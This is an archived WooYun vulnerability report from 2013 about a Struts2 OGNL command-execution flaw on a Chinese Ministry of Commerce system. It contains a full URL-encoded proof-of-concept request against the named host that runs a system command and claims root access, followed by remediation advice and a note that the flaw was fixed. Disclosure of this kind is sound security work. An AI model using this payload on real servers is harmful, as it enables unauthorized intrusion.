当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-023947

漏洞标题:中华人民共和国商务部某系统的一个任意命令执行

相关厂商:中华人民共和国商务部 mofcom.gov.cn

漏洞作者: x-star

提交时间:2013-05-17 12:31

修复时间:2013-05-22 12:32

公开时间:2013-05-22 12:32

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-05-17: 细节已通知厂商并且等待厂商处理中
2013-05-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

商务部网站存在任意命令执行漏洞

详细说明:

struts2内置私有变量class.classLoader.jarPath的set方法在变量赋值时会执行ognl表达式,借助OGNL表达式特性执行任意命令

漏洞证明:

POC : 

http://hsxt.mofcom.gov.cn/MOFCOM/manage.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23kxlzx%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23kxlzx.println%28%23d%29%2c%23kxlzx.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]


1.jpg


ROOT权限

2.jpg

修复方案:

1. 升级struts2到2.3.1.12以上版本
2. 过滤危险参数

版权声明:转载请注明来源 x-star@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-05-22 12:32

厂商回复:

漏洞Rank:10 (WooYun评价)

最新状态:

2013-05-22:汗,我记得已经确认了。也许是浏览器会话过期了,没确认成功。21日前未直接联系上商务部信息化管理部门,已在21日已经转由CNCERT协调商务部所属中国国际电子商务中心,由其联系网站管理方处置。22日,对方反馈已经完成处置,22日晚上测试确认已经修复。